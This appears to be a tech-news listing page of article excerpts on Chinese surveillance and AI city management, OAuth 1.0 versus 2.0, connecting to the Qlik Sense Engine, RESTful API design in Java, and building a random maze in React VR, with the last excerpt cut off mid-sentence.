There are 600 million mobile phone users in China, each producing a great deal of information about themselves. China has a notorious record of human rights abuses and the ruling Communist Party takes a controlling interest (a board seat) in many of the country's largest technology companies, to ensure the work done is in the interest of the party as well as profitable for the corporation. As a result, China is on the front foot when it comes to both AI and surveillance technology. China's surveillance tools could be a harbinger of the future in the Western world.

Chinese cities will be run by a private company

Alibaba, China's equivalent of Amazon, already has control over the traffic lights in one Chinese city, Hangzhou. Alibaba is far from shy about its ambitions. It has 120,000 developers working on the problem and intends to commercialise and sell the data it gathers about citizens. The AI based product they're using is called CityBrain. In the future, Chinese cities could well all be run by AI from the Alibaba corporation; the idea is to use this trial as a template for every city. The technology is likely to be placed in Kuala Lumpur next. In the areas under CityBrain's control, traffic speeds have increased by 15% already. However, some of those observing the situation have expressed concerns, not just about (the lack of) oversight of CityBrain's current capabilities but about the potential for future abuse.

What to make of this incredible list of surveillance capabilities

Facilities like Mapquest's new mapping service are beguiling.
They're clever ideas which create a better world. Similar technology, however, behind the scenes, is being adopted by law enforcement bodies in an ever-growing list of countries. Even for someone who understands cutting edge technology, the sum of those facilities may be surprising. Literally any aspect of your behaviour, from the way you walk, to your face, your heart rate and, of course, the contents of your phone and laptop, can now be monitored. Law enforcement can access and review information feeds with Artificial Intelligence software, to process and summarise findings quickly. In some cases, this is being done without the need for a warrant. Concerningly, these advances seem to be coming without policy or, in many cases, any form of oversight.

We must change how we think about AI, urge AI founding fathers


What's the difference between OAuth 1.0 and OAuth 2.0?

Pavan Ramchandani
13 Jun 2018
11 min read
The OAuth protocol specifies a process for resource owners to authorize third-party applications to access their server resources without sharing their credentials. This tutorial will take you through understanding the OAuth protocol and introduce you to the offerings of OAuth 2.0 in a practical manner. This article is an excerpt from a book written by Balachandar Bogunuva Mohanram, titled RESTful Java Web Services, Second Edition.

Consider a scenario where Jane (the user of an application) wants to let an application access her private data, which is stored with a third-party service provider. Before OAuth 1.0 or other similar open source protocols, such as Google AuthSub and FlickrAuth, if Jane wanted to let a consumer service use her data stored on some third-party service provider, she would need to give her user credentials to the consumer service to access data from the third-party service via appropriate service calls. Instead of Jane passing her login information to multiple consumer applications, OAuth 1.0 solves this problem by letting the consumer applications request authorization from the service provider on Jane's behalf. Jane does not divulge her login information; authorization is granted by the service provider, where both her data and credentials are stored. The consumer application (or consumer service) only receives an authorization token that can be used to access data from the service provider. Note that the user (Jane) has full control of the transaction and can invalidate the authorization token at any time during the signup process, or even after the two services have been used together.

The typical example used to explain OAuth 1.0 is that of a service provider that stores pictures on the web (let's call the service StorageInc) and a fictional consumer service that is a picture printing service (let's call the service PrintInc). On its own, PrintInc is a full-blown web service, but it does not offer picture storage; its business is only printing pictures. For convenience, PrintInc has created a web service that lets its users download their pictures from StorageInc for printing. This is what happens when a user (the resource owner) decides to use PrintInc (the client application) to print his/her images stored in StorageInc (the service provider):

1. The user creates an account in PrintInc. Let's call the user Jane, to keep things simple.
2. PrintInc asks whether Jane wants to use her pictures stored in StorageInc and presents a link to get the authorization to download her pictures (the protected resources). Jane is the resource owner here.
3. Jane decides to let PrintInc connect to StorageInc on her behalf and clicks on the authorization link.
4. Both PrintInc and StorageInc have implemented the OAuth protocol, so StorageInc asks Jane whether she wants to let PrintInc use her pictures. If she says yes, then StorageInc asks Jane to provide her username and password. Note, however, that her credentials are being used at StorageInc's site and PrintInc has no knowledge of her credentials.
5. Once Jane provides her credentials, StorageInc passes PrintInc an authorization token, which is stored as a part of Jane's account on PrintInc.
6. Now, we are back at PrintInc's web application, and Jane can now print any of her pictures stored in StorageInc's web service.
Finally, every time Jane wants to print more pictures, all she needs to do is come back to PrintInc's website and download her pictures from StorageInc without providing the username and password again, as she has already authorized these two web services to exchange data on her behalf.

The preceding example clearly portrays the authorization flow in the OAuth 1.0 protocol. Before getting deeper into OAuth 1.0, here is a brief overview of the common terminologies and roles that we saw in this example:

Client (consumer): This refers to an application (service) that tries to access a protected resource on behalf of the resource owner and with the resource owner's consent. A client can be a business service, mobile, web, or desktop application. In the previous example, PrintInc is the client application.

Server (service provider): This refers to an HTTP server that understands the OAuth protocol. It accepts and responds to the requests authenticated with the OAuth protocol from various client applications (consumers). If you relate this with the previous example, StorageInc is the service provider.

Protected resource: Protected resources are resources hosted on servers (the service providers) that are access-restricted. The server validates all incoming requests and grants access to the resource, as appropriate.

Resource owner: This refers to an entity capable of granting access to a protected resource. Mostly, it refers to an end user who owns the protected resource. In the previous example, Jane is the resource owner.

Consumer key and secret (client credentials): These two strings are used to identify and authenticate the client application (the consumer) making the request.

Request token (temporary credentials): This is a temporary credential provided by the server when the resource owner authorizes the client application to use the resource. As the next step, the client will send this request token to the server to get authorized. On successful authorization, the server returns an access token. The access token is explained next.

Access token (token credentials): The server returns an access token to the client when the client submits the temporary credentials obtained from the server during the resource grant approval by the user. The access token is a string that identifies a client that requests for protected resources. Once the access token is obtained, the client passes it along with each resource request to the server. The server can then verify the identity of the client by checking this access token.

The following sequence diagram shows the interactions between the various parties involved in the OAuth 1.0 protocol. You can get more information about the OAuth 1.0 protocol here.
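What the excerpt doesn't show is the bookkeeping this model puts on the client: in OAuth 1.0, every request for a protected resource has to carry a signature (typically HMAC-SHA1) computed over the request parameters with the consumer secret and token secret. The following is a rough, standalone Python sketch of that signing step; the PrintInc/StorageInc keys, secrets, and URL are made up for illustration and none of this code comes from the book:

import base64
import hashlib
import hmac
import secrets
import time
from urllib.parse import quote


def percent_encode(value: str) -> str:
    # RFC 3986 percent-encoding, as required by OAuth 1.0
    return quote(value, safe="")


def sign_request(method: str, url: str, params: dict, consumer_secret: str, token_secret: str) -> str:
    # 1. Normalise the parameters: percent-encode, sort, and join them as key=value pairs
    encoded = sorted((percent_encode(k), percent_encode(v)) for k, v in params.items())
    param_string = "&".join(f"{k}={v}" for k, v in encoded)
    # 2. Build the signature base string: METHOD & URL & parameters, each encoded
    base_string = "&".join([method.upper(), percent_encode(url), percent_encode(param_string)])
    # 3. The signing key combines the consumer secret and the token secret
    key = f"{percent_encode(consumer_secret)}&{percent_encode(token_secret)}"
    digest = hmac.new(key.encode(), base_string.encode(), hashlib.sha1).digest()
    return base64.b64encode(digest).decode()


# Hypothetical values, standing in for PrintInc's client credentials and Jane's token
params = {
    "oauth_consumer_key": "printinc-key",
    "oauth_token": "jane-access-token",
    "oauth_signature_method": "HMAC-SHA1",
    "oauth_timestamp": str(int(time.time())),
    "oauth_nonce": secrets.token_hex(8),
    "oauth_version": "1.0",
}
params["oauth_signature"] = sign_request(
    "GET", "https://storageinc.example/photos", params,
    "printinc-consumer-secret", "jane-token-secret",
)
# params, including the signature, would now be sent with this one request;
# the next request needs a fresh nonce, timestamp, and signature.

This per-request signing is exactly the overhead that the next section calls out as one of the motivations for OAuth 2.0.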
OAuth 2.0 requires neither the client nor the server to generate any signature for securing the messages. Security is enforced via the use of TLS/SSL (HTTPS) for all communication. Addressing non-browser client applications: Many features of OAuth 1.0 are designed by considering the way a web client application interacts with the inbound and outbound messages. This has proven to be inefficient while using it with non-browser clients such as on-device mobile applications. OAuth 2.0 addresses this issue by accommodating more authorization flows suitable for specific client needs that do not use any web UI, such as on-device (native) mobile applications or API services. This makes the protocol very flexible. The separation of roles: OAuth 2.0 clearly defines the roles for all parties involved in the communication, such as the client, resource owner, resource server, and authorization server. The specification is clear on which parts of the protocol are expected to be implemented by the resource owner, authorization server, and resource server. The short-lived access token: Unlike in the previous version, the access token in OAuth 2.0 can contain an expiration time, which improves the security and reduces the chances of illegal access. The refresh token: OAuth 2.0 offers a refresh token that can be used for getting a new access token on the expiry of the current one, without going through the entire authorization process again. Before we get into the details of OAuth 2.0, let's take a quick look at how OAuth 2.0 defines roles for each party involved in the authorization process. Though you might have seen similar roles while discussing OAuth 1.0 in last section, it does not clearly define which part of the protocol is expected to be implemented by each one: The resource owner: This refers to an entity capable of granting access to a protected resource. In a real-life scenario, this can be an end user who owns the resource. The resource server: This hosts the protected resources. The resource server validates and authorizes the incoming requests for the protected resource by contacting the authorization server. The client (consumer): This refers to an application that tries to access protected resources on behalf of the resource owner. It can be a business service, mobile, web, or desktop application. Authorization server: This, as the name suggests, is responsible for authorizing the client that needs access to a resource. After successful authentication, the access token is issued to the client by the authorization server. In a real-life scenario, the authorization server may be either the same as the resource server or a separate entity altogether. The OAuth 2.0 specification does not really enforce anything on this part. It would be interesting to learn how these entities talk with each other to complete the authorization flow. The following is a quick summary of the authorization flow in a typical OAuth 2.0 implementation: Let's understand the diagram in more detail: The client application requests authorization to access the protected resources from the resource owner (user). The client can either directly make the authorization request to the resource owner or via the authorization server by redirecting the resource owner to the authorization server endpoint. The resource owner authenticates and authorizes the resource access request from the client application and returns the authorization grant to the client. 
The authorization grant type returned by the resource owner depends on the type of client application that tries to access the OAuth protected resource. Note that the OAuth 2.0 protocol defines four types of grants in order to authorize access to protected resources. The client application requests an access token from the authorization server by passing the authorization grant along with other details for authentication, such as the client ID, client secret, and grant type. On successful authentication, the authorization server issues an access token (and, optionally, a refresh token) to the client application. The client application requests the protected resource (RESTful web API) from the resource server by presenting the access token for authentication. On successful authentication of the client request, the resource server returns the requested resource. The sequence of interaction that we just discussed is of a very high level. Depending upon the grant type used by the client, the details of the interaction may change. The following section will help you understand the basics of grant types. Understanding grant types in OAuth 2.0 Grant types in the OAuth 2.0 protocol are, in essence, different ways to authorize access to protected resources using different security credentials (for each type). The OAuth 2.0 protocol defines four types of grants, as listed here; each can be used in different scenarios, as appropriate: Authorization code: This is obtained from the authentication server instead of directly requesting it from the resource owner. In this case, the client directs the resource owner to the authorization server, which returns the authorization code to the client. This is very similar to OAuth 1.0, except that the cryptographic signing of messages is not required in OAuth 2.0. Implicit: This grant is a simplified version of the authorization code grant type flow. In the implicit grant flow, the client is issued an access token directly as the result of the resource owner's authorization. This is less secure, as the client is not authenticated. This is commonly used for client-side devices, such as mobile, where the client credentials cannot be stored securely. Resource owner password credentials: The resource owner's credentials, such as username and password, are used by the client for directly obtaining the access token during the authorization flow. The access code is used thereafter for accessing resources. This grant type is only used with trusted client applications. This is suitable for legacy applications that use the HTTP basic authentication to incrementally transition to OAuth 2.0. Client credentials: These are used directly for getting access tokens. This grant type is used when the client is also the resource owner. This is commonly used for embedded services and backend applications, where the client has an account (direct access rights). Read Next: Understanding OAuth Authentication methods - Tutorial OAuth 2.0 – Gaining Consent - Tutorial
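To make the four grant types above more concrete, the following is a minimal sketch of the token exchange used in the authorization code grant. The host name, endpoint path, client identifiers, and token values shown here are placeholders for illustration (the sample token strings are borrowed from the RFC 6749 examples); this is not code or configuration from the book:

POST /oauth2/token HTTP/1.1
Host: auth.example.com
Content-Type: application/x-www-form-urlencoded

grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA
&redirect_uri=https%3A%2F%2Fclient.example.com%2Fcallback
&client_id=printinc-web-app&client_secret=printinc-secret

HTTP/1.1 200 OK
Content-Type: application/json

{
  "access_token": "2YotnFZFEjr1zCsicMWpAA",
  "token_type": "Bearer",
  "expires_in": 3600,
  "refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA"
}

The client then presents the access token on each resource request, typically in an Authorization: Bearer header, and uses the refresh token to obtain a new access token once the current one expires.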

5 ways to create a connection to the Qlik Engine [Tip]

Amey Varangaonkar
13 Jun 2018
8 min read
With mashups or web apps, the Qlik Engine sits outside of your project and is not accessible and loaded by default. The first step before doing anything else is to create a connection with the Qlik Engine, after which you can continue to open a session and perform further actions on that app, such as: Opening a document/app Making selections Retrieving visualizations and apps For using the Qlik Engine API, open a WebSocket to the engine. There may be a difference in the way you do this, depending on whether you are working with Qlik Sense Enterprise or Qlik Sense Desktop. In this article, we will elaborate on how you can achieve a connection to the Qlik engine and the benefits of doing so. The following excerpt has been taken from the book Mastering Qlik Sense, authored by Martin Mahler and Juan Ignacio Vitantonio. Creating a connection To create a connection using WebSockets, you first need to establish a new web socket communication line. To open a WebSocket to the engine, use one of the following URIs: Qlik Sense Enterprise Qlik Sense Desktop wss://server.domain.com:4747/app/ or wss://server.domain.com[/virtual proxy]/app/ ws://localhost:4848/app Creating a Connection using WebSockets In the case of Qlik Sense Desktop, all you need to do is define a WebSocket variable, including its connection string in the following way: var ws = new WebSocket("ws://localhost:4848/app/"); Once the connection is opened and checking for ws.open(), you can call additional methods to the engine using ws.send(). This example will retrieve the number of available documents in my Qlik Sense Desktop environment, and append them to an HTML list: <html> <body> <ul id='docList'> </ul> </body> </html> <script> var ws = new WebSocket("ws://localhost:4848/app/"); var request = { "handle": -1, "method": "GetDocList", "params": {}, "outKey": -1, "id": 2 } ws.onopen = function(event){ ws.send(JSON.stringify(request)); // Receive the response ws.onmessage = function (event) { var response = JSON.parse(event.data); if(response.method != ' OnConnected'){ var docList = response.result.qDocList; var list = ''; docList.forEach(function(doc){ list += '<li>'+doc.qDocName+'</li>'; }) document.getElementById('docList').innerHTML = list; } } } </script> The preceding example will produce the following output on your browser if you have Qlik Sense Desktop running in the background: All Engine methods and calls can be tested in a user-friendly way by exploring the Qlik Engine in the Dev Hub. A single WebSocket connection can be associated with only one engine session (consisting of the app context, plus the user). If you need to work with multiple apps, you must open a separate WebSocket for each one. If you wish to create a WebSocket connection directly to an app, you can extend the configuration URL to include the application name, or in the case of the Qlik Sense Enterprise, the GUID. You can then use the method from the app class and any other classes as you continue to work with objects within the app. var ws = new WebSocket("ws://localhost:4848/app/MasteringQlikSense.qvf"); Creating  Connection to the Qlik Server Engine Connecting to the engine on a Qlik Sense environment is a little bit different as you will need to take care of authentication first. 
Authentication is handled in different ways, depending on how you have set up your server configuration, with the most common ones being: Ticketing Certificates Header authentication Authentication also depends on where the code that is interacting with the Qlik Engine is running. If your code is running on a trusted computer, authentication can be performed in several ways, depending on how your installation is configured and where the code is running: If you are running the code from a trusted computer, you can use certificates, which first need to be exported via the QMC If the code is running on a web browser, or certificates are not available, then you must authenticate via the virtual proxy of the server Creating a connection using certificates Certificates can be considered as a seal of trust, which allows you to communicate with the Qlik Engine directly with full permission. As such, only backend solutions ever have access to certificates, and you should guard how you distribute them carefully. To connect using certificates, you first need to export them via the QMC, which is a relatively easy thing to do: Once they are exported, you need to copy them to the folder where your project is located using the following code: <html> <body> <h1>Mastering QS</h1> </body> <script> var certPath = path.join('C:', 'ProgramData', 'Qlik', 'Sense', 'Repository', 'Exported Certificates', '.Local Certificates'); var certificates = { cert: fs.readFileSync(path.resolve(certPath, 'client.pem')), key: fs.readFileSync(path.resolve(certPath, 'client_key.pem')), root: fs.readFileSync(path.resolve(certPath, 'root.pem')) }; // Open a WebSocket using the engine port (rather than going through the proxy) var ws = new WebSocket('wss://server.domain.com:4747/app/', { ca: certificates.root, cert: certificates.cert, key: certificates.key, headers: { 'X-Qlik-User': 'UserDirectory=internal; UserId=sa_engine' } }); ws.onopen = function (event) { // Call your methods } </script> Creating a connection using the Mashup API Now, while connecting to the engine is a fundamental step to start interacting with Qlik, it's very low-level, connecting via WebSockets. For advanced use cases, the Mashup API is one way to help you get up to speed with a more developer-friendly abstraction layer. The Mashup API utilizes the qlik interface as an external interface to Qlik Sense, used for mashups and for including Qlik Sense objects in external web pages. To load the qlik module, you first need to ensure RequireJS is available in your main project file. You will then have to specify the URL of your Qlik Sense environment, as well as the prefix of the virtual proxy, if there is one: <html> <body> <h1>Mastering QS</h1> </body> </html> <script src="https://cdnjs.cloudflare.com/ajax/libs/require.js/2.3.5/require.min.js"> <script> //Prefix is used for when a virtual proxy is used with the browser. var prefix = window.location.pathname.substr( 0, window.location.pathname.toLowerCase().lastIndexOf( "/extensions" ) + 1 ); //Config for retrieving the qlik.js module from the Qlik Sense Server var config = { host: window.location.hostname, prefix: prefix, port: window.location.port, isSecure: window.location.protocol === "https:" }; require.config({ baseUrl: (config.isSecure ? "https://" : "http://" ) + config.host + (config.port ? 
":" + config.port : "" ) + config.prefix + "resources" }); require(["js/qlik"], function (qlik) { qlik.setOnError( function (error) { console.log(error); }); //Open an App var app = qlik.openApp('MasteringQlikSense.qvf', config); </script> Once you have created the connection to an app, you can start leveraging the full API by conveniently creating HyperCubes, connecting to fields, passing selections, retrieving objects, and much more. The Mashup API is intended for browser-based projects where authentication is handled in the same way as if you were going to open Qlik Sense. If you wish to use the Mashup API, or some parts of it, with a backend solution, you need to take care of authentication first. Creating a connection using enigma.js Enigma is Qlik's open-source promise wrapper for the engine. You can use enigma directly when you're in the Mashup API, or you can load it as a separate module. When you are writing code from within the Mashup API, you can retrieve the correct schema directly from the list of available modules which are loaded together with qlik.js via 'autogenerated/qix/engine-api'.   The following example will connect to a Demo App using enigma.js: define(function () { return function () { require(['qlik','enigma','autogenerated/qix/engine-api'], function (qlik, enigma, schema) { //The base config with all details filled in var config = { schema: schema, appId: "My Demo App.qvf", session:{ host:"localhost", port: 4848, prefix: "", unsecure: true, }, } //Now that we have a config, use that to connect to the //QIX service. enigma.getService("qix" , config).then(function(qlik){ qlik.global.openApp(config.appId) //Open App qlik.global.openApp(config.appId).then(function(app){ //Create SessionObject for FieldList app.createSessionObject( { qFieldListDef: { qShowSystem: false, qShowHidden: false, qShowSrcTables: true, qShowSemantic: true, qShowDerivedFields: true }, qInfo: { qId: "FieldList", qType: "FieldList" } } ).then( function(list) { return list.getLayout(); } ).then( function(listLayout) { return listLayout.qFieldList.qItems; } ).then( function(fieldItems) { console.log(fieldItems) } ); }) } })}}) It's essential to also load the correct schema whenever you load enigma.js. The schema is a collection of the available API methods that can be utilized in each version of Qlik Sense. This means your schema needs to be in sync with your QS version. Thus, we see it is fairly easy to create a stable connection with the Qlik Engine API. If you liked the above excerpt, make sure you check out the book Mastering Qlik Sense to learn more tips and tricks on working with different kinds of data using Qlik Sense and extract useful business insights. How Qlik Sense is driving self-service Business Intelligence Overview of a Qlik Sense® Application’s Life Cycle What we learned from Qlik Qonnections 2018

Design a RESTful web API with Java [Tutorial]

Pavan Ramchandani
12 Jun 2018
12 min read
In today's tutorial, you will learn to design REST services. We will break down the key design considerations you need to make when building RESTful web APIs. In particular, we will focus on the core elements of the REST architecture style:

Resources and their identifiers
Interaction semantics for RESTful APIs (HTTP methods)
Representation of resources
Hypermedia controls

This article is an excerpt from a book written by Balachandar Bogunuva Mohanram, titled RESTful Java Web Services, Second Edition. This book will help you build robust, scalable and secure RESTful web services, making use of the JAX-RS and Jersey framework extensions. Let's start by discussing the guidelines for identifying resources in a problem domain.

Richardson Maturity Model: Leonard Richardson developed a model to help with assessing the compliance of a service to the REST architecture style. The model defines four levels of maturity, starting from level-0 to level-3 as the highest maturity level. The maturity levels are decided considering the aforementioned principle elements of the REST architecture.

Identifying resources in the problem domain

The basic steps that you need to take while building a RESTful web API for a specific problem domain are:

Identify all possible objects in the problem domain. This can be done by identifying all the key nouns in the problem domain. For example, if you are building an application to manage employees in a department, the obvious nouns are department and employee.
The next step is to identify the objects that can be manipulated using CRUD operations. These objects can be classified as resources. Note that you should be careful while choosing resources. Based on the usage pattern, you can classify resources as top-level and nested resources (which are the children of a top-level resource). Also, there is no need to expose all resources for use by the client; expose only those resources that are required for implementing the business use case.

Transforming operations to HTTP methods

Once you have identified all resources, as the next step, you may want to map the operations defined on the resources to the appropriate HTTP methods. The most commonly used HTTP methods (verbs) in RESTful web APIs are POST, GET, PUT, and DELETE. Note that there is no one-to-one mapping between the CRUD operations defined on the resources and the HTTP methods. Understanding the concepts of idempotent and safe operations will help with using the correct HTTP method.

An operation is called idempotent if multiple identical requests produce the same result. Similarly, an idempotent RESTful web API will always produce the same result on the server irrespective of how many times the request is executed with the same parameters; however, the response may change between requests. An operation is called safe if it does not modify the state of the resources. Check out the following table:

Method    Idempotent   Safe
GET       YES          YES
OPTIONS   YES          YES
HEAD      YES          YES
POST      NO           NO
PATCH     NO           NO
PUT       YES          NO
DELETE    YES          NO

Here are some tips for identifying the most appropriate HTTP method for the operations that you want to perform on the resources:

GET: You can use this method for reading a representation of a resource from the server. According to the HTTP specification, GET is a safe operation, which means that it is only intended for retrieving data, not for making any state changes. As this is an idempotent operation, multiple identical GET requests will behave in the same manner. 
A GET method can return the 200 OK HTTP response code on the successful retrieval of resources. If there is any error, it can return an appropriate status code such as 404 NOT FOUND or 400 BAD REQUEST. DELETE: You can use this method for deleting resources. On successful deletion, DELETE can return the 200 OK status code. According to the HTTP specification, DELETE is an idempotent operation. Note that when you call DELETE on the same resource for the second time, the server may return the 404 NOT FOUND status code since it was already deleted, which is different from the response for the first request. The change in response for the second call is perfectly valid here. However, multiple DELETE calls on the same resource produce the same result (state) on the server. PUT: According to the HTTP specification, this method is idempotent. When a client invokes the PUT method on a resource, the resource available at the given URL is completely replaced with the resource representation sent by the client. When a client uses the PUT request on a resource, it has to send all the available properties of the resource to the server, not just the partial data that was modified within the request. You can use PUT to create or update a resource if all attributes of the resource are available with the client. This makes sure that the server state does not change with multiple PUT requests. On the other hand, if you send partial resource content in a PUT request multiple times, there is a chance that some other clients might have updated some attributes that are not present in your request. In such cases, the server cannot guarantee that the state of the resource on the server will remain identical when the same request is repeated, which breaks the idempotency rule. POST: This method is not idempotent. This method enables you to use the POST method to create or update resources when you do not know all the available attributes of a resource. For example, consider a scenario where the identifier field for an entity resource is generated at the server when the entity is persisted in the data store. You can use the POST method for creating such resources as the client does not have an identifier attribute while issuing the request. Here is a simplified example that illustrates this scenario. In this example, the employeeID attribute is generated on the server: POST hrapp/api/employees HTTP/1.1 Host: packtpub.com {employee entity resource in JSON} On the successful creation of a resource, it is recommended to return the status of 201 Created and the location of the newly created resource. This allows the client to access the newly created resource later (with server-generated attributes). The sample response for the preceding example will look as follows: 201 Created Location: hrapp/api/employees/1001 Best practice Use caching only for idempotent and safe HTTP methods, as others have an impact on the state of the resources. Understanding the difference between PUT and POST A common question that you will encounter while designing a RESTful web API is when you should use the PUT and POST methods? Here's the simplified answer: You can use PUT for creating or updating a resource, when the client has the full resource content available. In this case, all values are with the client and the server does not generate a value for any of the fields. You will use POST for creating or updating a resource if the client has only partial resource content available. 
Note that you are losing the idempotency support with POST. An idempotent method means that you can call the same API multiple times without changing the state. This is not true for the POST method; each POST method call may result in a server state change. PUT is idempotent, and POST is not. If you have strong customer demands, you can support both methods and let the client choose the suitable one on the basis of the use case.

Naming RESTful web resources

Resources are a fundamental concept in RESTful web services. A resource represents an entity that is accessible via the URI that you provide. The URI, which refers to a resource (which is known as a RESTful web API), should have a logically meaningful name. Having meaningful names improves the intuitiveness of the APIs and, thereby, their usability. Some of the widely followed recommendations for naming resources are shown here:

It is recommended you use nouns to name both resources and path segments that will appear in the resource URI. You should avoid using verbs for naming resources and resource path segments. Using nouns to name a resource improves the readability of the corresponding RESTful web API, particularly when you are planning to release the API over the internet for the general public.

You should always use plural nouns to refer to a collection of resources. Make sure that you are not mixing up singular and plural nouns while forming the REST URIs. For instance, to get all departments, the resource URI must look like /departments. If you want to read a specific department from the collection, the URI becomes /departments/{id}. Following the convention, the URI for reading the details of the HR department identified by id=10 should look like /departments/10. The following table illustrates how you can map the HTTP methods (verbs) to the operations defined for the departments' resources:

Resource          GET                                POST                       PUT                           DELETE
/departments      Get all departments                Create a new department    Bulk update on departments    Delete all departments
/departments/10   Get the HR department with id=10   Not allowed                Update the HR department      Delete the HR department

While naming resources, use specific names over generic names. For instance, to read all programmers' details of a software firm, it is preferable to have a resource URI of the form /programmers (which tells about the type of resource), over the much generic form /employees. This improves the intuitiveness of the APIs by clearly communicating the type of resources that it deals with.

Keep the resource names that appear in the URI in lowercase to improve the readability of the resulting resource URI. Resource names may include hyphens; avoid using underscores and other punctuation.

If the entity resource is represented in the JSON format, field names used in the resource must conform to the following guidelines:

Use meaningful names for the properties
Follow the camel case naming convention: the first letter of the name is in lowercase, for example, departmentName
The first character must be a letter, an underscore (_), or a dollar sign ($), and the subsequent characters can be letters, digits, underscores, and/or dollar signs
Avoid using the reserved JavaScript keywords

If a resource is related to another resource(s), use a subresource to refer to the child resource. You can use the path parameter in the URI to connect a subresource to its base resource. For instance, the resource URI path to get all employees belonging to the HR department (with id=10) will look like /departments/10/employees. 
To get the details of employee with id=200 in the HR department, you can use the following URI: /departments/10/employees/200. The resource path URI may contain plural nouns representing a collection of resources, followed by a singular resource identifier to return a specific resource item from the collection. This pattern can repeat in the URI, allowing you to drill down a collection for reading a specific item. For instance, the following URI represents an employee resource identified by id=200 within the HR department: /departments/hr/employees/200. Although the HTTP protocol does not place any limit on the length of the resource URI, it is recommended not to exceed 2,000 characters because of the restriction set by many popular browsers. Best practice: Avoid using actions or verbs in the URI as it refers to a resource. Using HATEOAS in response representation Hypertext as the Engine of Application State (HATEOAS) refers to the use of hypermedia links in the resource representations. This architectural style lets the clients dynamically navigate to the desired resource by traversing the hypermedia links present in the response body. There is no universally accepted single format for representing links between two resources in JSON. Hypertext Application Language The Hypertext API Language (HAL) is a promising proposal that sets the conventions for expressing hypermedia controls (such as links) with JSON or XML. Currently, this proposal is in the draft stage. It mainly describes two concepts for linking resources: Embedded resources: This concept provides a way to embed another resource within the current one. In the JSON format, you will use the _embedded attribute to indicate the embedded resource. Links: This concept provides links to associated resources. In the JSON format, you will use the _links attribute to link resources. Here is the link to this proposal: http://tools.ietf.org/html/draft-kelly-json-hal-06. It defines the following properties for each resource link: href: This property indicates the URI to the target resource representation template: This property would be true if the URI value for href has any PATH variable inside it (template) title: This property is used for labeling the URI hreflang: This property specifies the language for the target resource title: This property is used for documentation purposes name: This property is used for uniquely identifying a link The following example demonstrates how you can use the HAL format for describing the department resource containing hyperlinks to the associated employee resources. This example uses the JSON HAL for representing resources, which is represented using the application/hal+json media type: GET /departments/10 HTTP/1.1 Host: packtpub.com Accept: application/hal+json HTTP/1.1 200 OK Content-Type: application/hal+json { "_links": { "self": { "href": "/departments/10" }, "employees": { "href": "/departments/10/employees" }, "employee": { "href": "/employees/{id}", "templated": true } }, "_embedded": { "manager": { "_links": { "self": { "href": "/employees/1700" } }, "firstName": "Chinmay", "lastName": "Jobinesh", "employeeId": "1700", } }, "departmentId": 10, "departmentName": "Administration" } To summarize, we discussed the details of designing RESTful web APIs including identifying the resources, using HTTP methods, and naming the web resources. Additionally we got introduced to Hypertext application language. 
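Bringing the HTTP method mapping and the naming guidelines together, here is a minimal JAX-RS sketch of the departments resource discussed above. It is an illustrative skeleton only: the DepartmentService helper and the Department bean are assumed classes for this example, not code from the book.

import java.net.URI;
import java.util.List;
import javax.ws.rs.Consumes;
import javax.ws.rs.DELETE;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.PUT;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.Response;

@Path("departments")
@Produces(MediaType.APPLICATION_JSON)
@Consumes(MediaType.APPLICATION_JSON)
public class DepartmentResource {

    // DepartmentService and Department are assumed helper classes for this sketch
    private final DepartmentService service = new DepartmentService();

    @GET
    public List<Department> getAllDepartments() {
        // GET /departments - read the whole collection
        return service.findAll();
    }

    @GET
    @Path("{id}")
    public Department getDepartment(@PathParam("id") int id) {
        // GET /departments/10 - read a single department
        return service.findById(id);
    }

    @POST
    public Response createDepartment(Department dept) {
        // POST /departments - the server generates the identifier
        int newId = service.create(dept);
        // Respond with 201 Created plus the Location of the new resource
        return Response.created(URI.create("departments/" + newId)).build();
    }

    @PUT
    @Path("{id}")
    public Department updateDepartment(@PathParam("id") int id, Department dept) {
        // PUT /departments/10 - full replacement, idempotent
        return service.update(id, dept);
    }

    @DELETE
    @Path("{id}")
    public Response deleteDepartment(@PathParam("id") int id) {
        // DELETE /departments/10 - idempotent, returns 200 OK on success
        service.delete(id);
        return Response.ok().build();
    }
}

Each method lines up with a row of the mapping table shown earlier: the collection URI handles bulk reads and creation, while the item URI handles reads, full updates, and deletes of a single department.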
Read More: Getting started with Django RESTful Web Services Testing RESTful Web Services with Postman Documenting RESTful Java web services using Swagger

Building VR experiences with React VR 2.0: How to create maze that's new every time you play

Sunith Shetty
12 Jun 2018
16 min read
In today’s tutorial, we will examine the functionality required to build a simple maze. There are a few ways we could build a maze. The most straightforward way would be to fire up our 3D modeler package (say, Blender) and create a labyrinth out of polygons. This would work fine and could be very detailed. However, it would also be very boring. Why? The first time we get through the maze will be exciting, but after a few tries, you'll know the way through. When we construct VR experiences, you usually want people to visit often and have fun every time. This tutorial is an excerpt from a book written by John Gwinner titled Getting Started with React VR. In this book, you will learn how to create amazing 360 and virtual reality content that runs directly in your browsers. A modeled labyrinth would be boring. Life is too short to do boring things. So, we want to generate a Maze randomly. This way, you can change the Maze every time so that it'll be fresh and different. The way to do that is through random numbers to ensure that the Maze doesn't shift around us, so we want to actually do it with pseudo-random numbers. To start doing that, we'll need a basic application created. Please go to your VR directory and create an application called 'WalkInAMaze': react-vr init WalkInAMaze Almost random–pseudo random number generators To have a chance of replaying value or being able to compare scores between people, we really need a pseudo-random number generator. The basic JavaScript Math.random() is not a pseudo-random generator; it really gives you a totally random number every time. We need a pseudo-random number generator that takes a seed value. If you give the same seed to the random number generator, it will generate the same sequence of random numbers. (They aren't completely random but are very close.) Random number generators are a complex topic; for example, they are used in cryptography, and if your random number generator isn't completely random, someone could break your code. We aren't so worried about that, we just want repeatability. Although the UI for this may be a bit beyond the scope of this book, creating the Maze in a way that clicking on Refresh won't generate a totally different Maze is really a good thing and will avoid frustration on the part of the user. This will also allow two users to compare scores; we could persist a board number for the Maze and show this. This may be out of scope for our book; however, having a predictable Maze will help immensely during development. If it wasn't for this, you might get lost while working on your world. (Well, probably not, but it makes testing easier.) Including library code from other projects Up to this point, I've shown you how to create components in React VR (or React). JavaScript interestingly has a historical issue with include. With C++, Java, or C#, you can include a file in another file or make a reference to a file in a project. After doing that, everything in those other files, such as functions, classes, and global properties (variables), are then usable from the file that you've issued the include statement in. With a browser, the concept of "including" JavaScript is a 